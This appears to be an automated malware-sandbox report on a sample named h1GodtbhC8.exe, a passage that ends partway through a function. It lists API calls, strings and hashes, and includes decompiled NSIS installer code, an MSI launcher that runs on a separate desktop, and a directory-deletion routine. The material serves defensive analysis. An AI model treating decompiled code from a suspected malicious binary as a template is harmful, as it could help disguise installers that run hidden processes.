                                                                                                                                                  Chronological Activities

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >

                                                                                                                                                    Analysis Process: h1GodtbhC8.exe PID: 5356 Parent PID: 5672 h1GodtbhC8.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 6E624C20, Relevance: 96.8, APIs: 32, Strings: 23, Instructions: 532memorythreadsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6247D0: _DebugHeapAllocator.LIBCPMTD ref: 6E62482D
                                                                                                                                                      • Part of subcall function 6E6247D0: PathFileExistsW.KERNELBASE(00000000,?,?,?,3920FDCC), ref: 6E624BB9
                                                                                                                                                      • Part of subcall function 6E6247D0: _DebugHeapAllocator.LIBCPMTD ref: 6E624BDF
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624CFD
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624D4B
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E624D56
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E624D5D
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000104,00000104,?), ref: 6E624D8C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E624DA3
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E624DB7
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E624DD9
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6E624E8F
                                                                                                                                                    • GetThreadDesktop.USER32(00000000,?,00000000,?,?), ref: 6E624E96
                                                                                                                                                    • CreateDesktopW.USER32 ref: 6E624EB1
                                                                                                                                                      • Part of subcall function 6E631050: _DebugHeapAllocator.LIBCPMTD ref: 6E6310C6
                                                                                                                                                      • Part of subcall function 6E631050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6310D2
                                                                                                                                                      • Part of subcall function 6E631050: std::ios_base::good.LIBCPMTD ref: 6E6310DA
                                                                                                                                                    • SetThreadDesktop.USER32(00000000,?,00000000,?,?), ref: 6E624F13
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?), ref: 6E624F1D
                                                                                                                                                    • CloseDesktop.USER32(00000000,?,00000000,?,?), ref: 6E624F2A
                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,01000000,00000000,00000000,00000044,?), ref: 6E624F9F
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?), ref: 6E624FA9
                                                                                                                                                    • CloseDesktop.USER32(00000000,?,00000000,?,?), ref: 6E624FBE
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000488,?,00000000,?,?), ref: 6E62501D
                                                                                                                                                    • CreateJobObjectW.KERNEL32 ref: 6E62502A
                                                                                                                                                    • AssignProcessToJobObject.KERNEL32 ref: 6E625040
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6250C1
                                                                                                                                                    • Sleep.KERNEL32(?,6E68E520,00000000,00000000,?,?), ref: 6E6250D1
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?), ref: 6E624EC0
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextDesktopIdentityQueueWork$CloseCreateErrorLastThread$ObjectProcessstd::ios_base::good$AssignChangeCurrentEnvironmentExistsExpandFileFindNotificationPathSleepStrings
                                                                                                                                                    • String ID: "%s" %s$%s %s$.msi$<8bn$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$D$[SystemFolder]msiexec.exe /i "%s"$failed: %s$ignore action failure and continue installation$ignoreFailure$keepProcessAlive$process terminated$process was completed with exit code: %d$sib$start : %s$starting UI Script$step#%d: %s %s %s$timeout %d min. was reached but the process still active.$uiScriptTest$waitTimeout$|ohn
                                                                                                                                                    • API String ID: 1981216803-3279769768
                                                                                                                                                    • Opcode ID: d6c51876d27c92f078d2fc0570b9435d65ee0f6c05525dbc7e4ffd6bc146036c
                                                                                                                                                    • Instruction ID: f77c35ad6a67c7b8148895c7115d59ae02b18839433e9e3c122bb5594aec15b3
                                                                                                                                                    • Opcode Fuzzy Hash: d6c51876d27c92f078d2fc0570b9435d65ee0f6c05525dbc7e4ffd6bc146036c
                                                                                                                                                    • Instruction Fuzzy Hash: C2229F70D04248EFDB14DFE4DC54BEEBBB8AF56308F108569E4066B281DB746A44CFA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004038AF, Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			_entry_() {
				struct _SHFILEINFOW _v700;
				struct _SECURITY_ATTRIBUTES* _v716;
				struct _SECURITY_ATTRIBUTES* _v720;
				WCHAR* _v724;
				char _v736;
				signed int _v740;
				signed int _v744;
				struct _SECURITY_ATTRIBUTES* _v748;
				intOrPtr _v752;
				int _v756;
				intOrPtr _v760;
				struct _SECURITY_ATTRIBUTES* _v764;
				void* _v772;
				int _t34;
				short* _t42;
				signed int _t45;
				WCHAR* _t47;
				WCHAR* _t49;
				void* _t54;
				intOrPtr _t56;
				signed int _t58;
				void* _t73;
				int _t79;
				WCHAR* _t83;
				WCHAR* _t92;
				void* _t99;
				signed int _t100;
				signed int _t101;
				void* _t102;
				WCHAR* _t103;
				void* _t104;
				void* _t106;
				WCHAR* _t107;
				void* _t108;
				WCHAR* _t109;
				WCHAR* _t112;
				WCHAR* _t114;
				void* _t117;
				void* _t118;

				_t117 =  &_v724;
				_t108 = 0x20;
				_v716 = 0;
				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v720 = 0;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x47eb98 = _t34;
				 *0x47eab0 = E00406328(8);
				SHGetFileInfoW(0x40a264, 0,  &_v700, 0x2b4, 0); // executed
				E00406035(0x476aa0, L"NSIS Error");
				E00406035(0x4cf0a0, GetCommandLineW());
				 *0x47eab8 = GetModuleHandleW(0);
				_t42 = 0x4cf0a0;
				if( *0x4cf0a0 == 0x22) {
					_t108 = 0x22;
					_t42 = 0x4cf0a2;
				}
				_t109 = CharNextW(E00405D32(_t42, _t108));
				_v744 = _t109;
				while(1) {
					_t45 =  *_t109 & 0x0000ffff;
					_t120 = _t45;
					if(_t45 == 0) {
						break;
					}
					_t102 = 0x20;
					__eflags = _t45 - _t102;
					if(_t45 != _t102) {
						L5:
						__eflags =  *_t109 - 0x22;
						if( *_t109 == 0x22) {
							_t109 =  &(_t109[1]);
							__eflags = _t109;
							_t102 = 0x22;
						}
						__eflags =  *_t109 - 0x2f;
						if( *_t109 != 0x2f) {
							L17:
							_t109 = E00405D32(_t109, _t102);
							__eflags =  *_t109 - 0x22;
							if(__eflags == 0) {
								_t109 =  &(_t109[1]);
								__eflags = _t109;
							}
							continue;
						}
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - 0x53;
						if( *_t109 != 0x53) {
							L12:
							_t47 = E0040382C(_t109, L"NCRC", 4);
							_t118 = _t117 + 0xc;
							__eflags = _t47;
							if(_t47 != 0) {
								L16:
								_t12 = _t109 - 4; // -6
								_t49 = E0040382C(_t12, L" /D=", 4);
								_t117 = _t118 + 0xc;
								__eflags = _t49;
								if(_t49 == 0) {
									_t13 = _t109 - 4; // -6
									E0040824C(_t13, 0, 8);
									_t117 = _t117 + 0xc;
									__eflags =  &(_t109[2]);
									E00406035(0x4d30a8,  &(_t109[2]));
									break;
								}
								goto L17;
							}
							_t100 = _t109[4] & 0x0000ffff;
							__eflags = _t100 - 0x20;
							if(_t100 == 0x20) {
								L15:
								_t10 =  &_v744;
								 *_t10 = _v744 | 0x00000004;
								__eflags =  *_t10;
								goto L16;
							}
							__eflags = _t100;
							if(_t100 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t101 = _t109[1] & 0x0000ffff;
						__eflags = _t101 - 0x20;
						if(_t101 == 0x20) {
							L11:
							_t7 =  &_v744;
							 *_t7 = _v744 | 0x00000002;
							__eflags =  *_t7;
							goto L12;
						}
						__eflags = _t101;
						if(_t101 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - _t102;
					} while ( *_t109 == _t102);
					goto L5;
				}
				_t103 = 0x4e30c8;
				GetTempPathW(0x2004, 0x4e30c8);
				_t54 = E004037F8(_t104, _t120);
				_t121 = _t54;
				if(_t54 != 0) {
					L24:
					DeleteFileW(0x4df0c0); // executed
					_t56 = E004035B3(_t122, _v744); // executed
					_v752 = _t56;
					if(_t56 != 0) {
						L34:
						E00403885(); // executed
						__imp__OleUninitialize(); // executed
						if(_v748 == 0) {
							__eflags =  *0x47eb74;
							if( *0x47eb74 != 0) {
								_t103 = E00406328(3);
								_t112 = E00406328(4);
								_t107 = E00406328(5);
								__eflags = _t103;
								if(_t103 != 0) {
									__eflags = _t112;
									if(_t112 != 0) {
										__eflags = _t107;
										if(_t107 != 0) {
											_t83 =  *_t103(GetCurrentProcess(), 0x28,  &_v736);
											__eflags = _t83;
											if(_t83 != 0) {
												 *_t112(0, L"SeShutdownPrivilege",  &_v740);
												_v756 = 1;
												_v744 = 2;
												 *_t107(_v760, 0,  &_v756, 0, 0, 0);
											}
										}
									}
								}
								_t79 = ExitWindowsEx(2, 0);
								__eflags = _t79;
								if(_t79 == 0) {
									E0040141D(9);
								}
							}
							_t58 =  *0x47eb8c;
							__eflags = _t58 - 0xffffffff;
							if(_t58 != 0xffffffff) {
								_v740 = _t58;
							}
							_push(_v740);
						} else {
							E00405CCC(_v748, 0x200010);
							_push(2); // executed
						}
						ExitProcess(); // executed
					}
					if( *0x47eb04 == 0) {
						L33:
						 *0x47eb8c =  *0x47eb8c | 0xffffffff;
						_v740 = E00405958(_t104);
						E00406113(_t104, 1);
						goto L34;
					}
					_t114 = E00405D32(0x4cf0a0, 0);
					while(_t114 >= 0x4cf0a0) {
						_t92 = E0040382C(_t114, L" _?=", 4);
						_t117 = _t117 + 0xc;
						__eflags = _t92;
						if(__eflags == 0) {
							break;
						}
						_t114 = _t114 - 2;
						__eflags = _t114;
					}
					_v748 = L"Error launching installer";
					_t126 = _t114 - 0x4cf0a0;
					if(_t114 < 0x4cf0a0) {
						lstrcatW(_t103, L"~nsu.tmp");
						if(lstrcmpiW(_t103, 0x4db0b8) == 0) {
							goto L34;
						}
						CreateDirectoryW(_t103, 0);
						SetCurrentDirectoryW(_t103);
						if( *0x4d30a8 == 0) {
							E00406035(0x4d30a8, 0x4db0b8);
						}
						E00406035(0x47f000, _v736);
						E00406035(0x483008, "A");
						_t106 = 0x1a;
						do {
							E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x120)));
							DeleteFileW(0x43dd40);
							if(_v756 != 0 && CopyFileW(0x4eb0d8, 0x43dd40, 1) != 0) {
								E00406C94(0x43dd40, 0);
								E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x124)));
								_t73 = E00405C6B(0x43dd40);
								if(_t73 != 0) {
									CloseHandle(_t73);
									_v748 = 0;
								}
							}
							 *0x483008 =  *0x483008 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
						E00406C94(_t103, 0);
						goto L34;
					}
					 *_t114 = 0;
					_t115 =  &(_t114[4]);
					if(E004067AA(_t126,  &(_t114[4])) == 0) {
						goto L34;
					}
					E00406035(0x4d30a8, _t115);
					E00406035(0x4d70b0, _t115);
					_v764 = 0;
					goto L33;
				}
				GetWindowsDirectoryW(0x4e30c8, 0x1fff);
				lstrcatW(0x4e30c8, L"\\Temp");
				_t99 = E004037F8(_t104, _t121);
				_t122 = _t99;
				if(_t99 == 0) {
					goto L34;
				}
				goto L24;
			}










































                                                                                                                                                    0x004038af
                                                                                                                                                    0x004038bd
                                                                                                                                                    0x004038be
                                                                                                                                                    0x004038c2
                                                                                                                                                    0x004038ca
                                                                                                                                                    0x004038ce
                                                                                                                                                    0x004038d9
                                                                                                                                                    0x004038e0
                                                                                                                                                    0x004038e8
                                                                                                                                                    0x004038f8
                                                                                                                                                    0x00403908
                                                                                                                                                    0x00403918
                                                                                                                                                    0x0040392a
                                                                                                                                                    0x0040393e
                                                                                                                                                    0x00403943
                                                                                                                                                    0x00403945
                                                                                                                                                    0x00403949
                                                                                                                                                    0x0040394a
                                                                                                                                                    0x0040394a
                                                                                                                                                    0x0040395d
                                                                                                                                                    0x0040395f
                                                                                                                                                    0x004039f6
                                                                                                                                                    0x004039f6
                                                                                                                                                    0x004039f9
                                                                                                                                                    0x004039fc
                                                                                                                                                    0x00403a02
                                                                                                                                                    0x00403a02
                                                                                                                                                    0x0040396a
                                                                                                                                                    0x0040396b
                                                                                                                                                    0x0040396e
                                                                                                                                                    0x00403978
                                                                                                                                                    0x00403978
                                                                                                                                                    0x0040397c
                                                                                                                                                    0x00403980
                                                                                                                                                    0x00403980
                                                                                                                                                    0x00403983
                                                                                                                                                    0x00403983
                                                                                                                                                    0x00403984
                                                                                                                                                    0x00403988
                                                                                                                                                    0x004039e4
                                                                                                                                                    0x004039eb
                                                                                                                                                    0x004039ed
                                                                                                                                                    0x004039f1
                                                                                                                                                    0x004039f3
                                                                                                                                                    0x004039f3
                                                                                                                                                    0x004039f3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039f1
                                                                                                                                                    0x0040398a
                                                                                                                                                    0x0040398d
                                                                                                                                                    0x00403991
                                                                                                                                                    0x004039a6
                                                                                                                                                    0x004039ae
                                                                                                                                                    0x004039b3
                                                                                                                                                    0x004039b6
                                                                                                                                                    0x004039b8
                                                                                                                                                    0x004039cd
                                                                                                                                                    0x004039cf
                                                                                                                                                    0x004039d8
                                                                                                                                                    0x004039dd
                                                                                                                                                    0x004039e0
                                                                                                                                                    0x004039e2
                                                                                                                                                    0x00403a06
                                                                                                                                                    0x00403a0b
                                                                                                                                                    0x00403a10
                                                                                                                                                    0x00403a13
                                                                                                                                                    0x00403a1c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403a1c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039e2
                                                                                                                                                    0x004039ba
                                                                                                                                                    0x004039be
                                                                                                                                                    0x004039c1
                                                                                                                                                    0x004039c8
                                                                                                                                                    0x004039c8
                                                                                                                                                    0x004039c8
                                                                                                                                                    0x004039c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039c8
                                                                                                                                                    0x004039c3
                                                                                                                                                    0x004039c6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039c6
                                                                                                                                                    0x00403993
                                                                                                                                                    0x00403997
                                                                                                                                                    0x0040399a
                                                                                                                                                    0x004039a1
                                                                                                                                                    0x004039a1
                                                                                                                                                    0x004039a1
                                                                                                                                                    0x004039a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004039a1
                                                                                                                                                    0x0040399c
                                                                                                                                                    0x0040399f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403970
                                                                                                                                                    0x00403970
                                                                                                                                                    0x00403970
                                                                                                                                                    0x00403973
                                                                                                                                                    0x00403973
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403970
                                                                                                                                                    0x00403a21
                                                                                                                                                    0x00403a2c
                                                                                                                                                    0x00403a32
                                                                                                                                                    0x00403a37
                                                                                                                                                    0x00403a39
                                                                                                                                                    0x00403a5f
                                                                                                                                                    0x00403a64
                                                                                                                                                    0x00403a6e
                                                                                                                                                    0x00403a73
                                                                                                                                                    0x00403a79
                                                                                                                                                    0x00403af8
                                                                                                                                                    0x00403af8
                                                                                                                                                    0x00403afd
                                                                                                                                                    0x00403b07
                                                                                                                                                    0x00403bfa
                                                                                                                                                    0x00403c00
                                                                                                                                                    0x00403c0b
                                                                                                                                                    0x00403c14
                                                                                                                                                    0x00403c1b
                                                                                                                                                    0x00403c1d
                                                                                                                                                    0x00403c1f
                                                                                                                                                    0x00403c21
                                                                                                                                                    0x00403c23
                                                                                                                                                    0x00403c25
                                                                                                                                                    0x00403c27
                                                                                                                                                    0x00403c37
                                                                                                                                                    0x00403c39
                                                                                                                                                    0x00403c3b
                                                                                                                                                    0x00403c48
                                                                                                                                                    0x00403c57
                                                                                                                                                    0x00403c5f
                                                                                                                                                    0x00403c67
                                                                                                                                                    0x00403c67
                                                                                                                                                    0x00403c3b
                                                                                                                                                    0x00403c27
                                                                                                                                                    0x00403c23
                                                                                                                                                    0x00403c6c
                                                                                                                                                    0x00403c72
                                                                                                                                                    0x00403c74
                                                                                                                                                    0x00403c78
                                                                                                                                                    0x00403c78
                                                                                                                                                    0x00403c74
                                                                                                                                                    0x00403c7d
                                                                                                                                                    0x00403c82
                                                                                                                                                    0x00403c85
                                                                                                                                                    0x00403c87
                                                                                                                                                    0x00403c87
                                                                                                                                                    0x00403c8b
                                                                                                                                                    0x00403b0d
                                                                                                                                                    0x00403b16
                                                                                                                                                    0x00403b1b
                                                                                                                                                    0x00403b1b
                                                                                                                                                    0x00403b1d
                                                                                                                                                    0x00403b1d
                                                                                                                                                    0x00403a81
                                                                                                                                                    0x00403ae1
                                                                                                                                                    0x00403ae1
                                                                                                                                                    0x00403aef
                                                                                                                                                    0x00403af3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403af3
                                                                                                                                                    0x00403a8a
                                                                                                                                                    0x00403aa5
                                                                                                                                                    0x00403a96
                                                                                                                                                    0x00403a9b
                                                                                                                                                    0x00403a9e
                                                                                                                                                    0x00403aa0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403aa2
                                                                                                                                                    0x00403aa2
                                                                                                                                                    0x00403aa2
                                                                                                                                                    0x00403aa9
                                                                                                                                                    0x00403ab1
                                                                                                                                                    0x00403ab3
                                                                                                                                                    0x00403b29
                                                                                                                                                    0x00403b3d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403b41
                                                                                                                                                    0x00403b48
                                                                                                                                                    0x00403b55
                                                                                                                                                    0x00403b5d
                                                                                                                                                    0x00403b5d
                                                                                                                                                    0x00403b6b
                                                                                                                                                    0x00403b7a
                                                                                                                                                    0x00403b81
                                                                                                                                                    0x00403b87
                                                                                                                                                    0x00403b93
                                                                                                                                                    0x00403b99
                                                                                                                                                    0x00403ba3
                                                                                                                                                    0x00403bb9
                                                                                                                                                    0x00403bca
                                                                                                                                                    0x00403bd0
                                                                                                                                                    0x00403bd7
                                                                                                                                                    0x00403bda
                                                                                                                                                    0x00403be0
                                                                                                                                                    0x00403be0
                                                                                                                                                    0x00403bd7
                                                                                                                                                    0x00403be4
                                                                                                                                                    0x00403beb
                                                                                                                                                    0x00403beb
                                                                                                                                                    0x00403bf0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403bf0
                                                                                                                                                    0x00403ab7
                                                                                                                                                    0x00403aba
                                                                                                                                                    0x00403ac5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403acd
                                                                                                                                                    0x00403ad8
                                                                                                                                                    0x00403add
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403add
                                                                                                                                                    0x00403a41
                                                                                                                                                    0x00403a4d
                                                                                                                                                    0x00403a52
                                                                                                                                                    0x00403a57
                                                                                                                                                    0x00403a59
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                    • OleUninitialize.OLE32(?), ref: 00403AFD
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E660F62, Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 309fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 6E660FC1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E660FD4
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 6E661020
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E66102A
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 6E661071
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E66107B
                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,*.*,?), ref: 6E6610C9
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E6610DA
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?), ref: 6E6611AC
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,?), ref: 6E6611C0
                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,DEL,00000000,?), ref: 6E6611E9
                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000001), ref: 6E66120C
                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 6E661225
                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,?,?,?,?), ref: 6E661235
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E66124A
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E661279
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E66129B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E6612BD
                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?), ref: 6E6612C7
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E6612D1
                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 6E6612F5
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E661310
                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 6E661346
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                    • String ID: *.*$DEL$c:\agent\_work\66\s\src\libs\dutil\dirutil.cpp
                                                                                                                                                    • API String ID: 1544372074-2145791747
                                                                                                                                                    • Opcode ID: f684c43f40737ab41119c4f4d7dee7866428915bf535f6182ade8bd647073fd6
                                                                                                                                                    • Instruction ID: 00828e0affe4bfe8403f09039634dec8ef0cf12e8483f99ab0180552158f5f77
                                                                                                                                                    • Opcode Fuzzy Hash: f684c43f40737ab41119c4f4d7dee7866428915bf535f6182ade8bd647073fd6
                                                                                                                                                    • Instruction Fuzzy Hash: 46A12972C6163AABDB7086E58C04BDB77AD6F42764F010291ED5DFB190DB318D84CAE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406CC7, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E00406CC7(void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				WCHAR* _v12;
				signed int _v16;
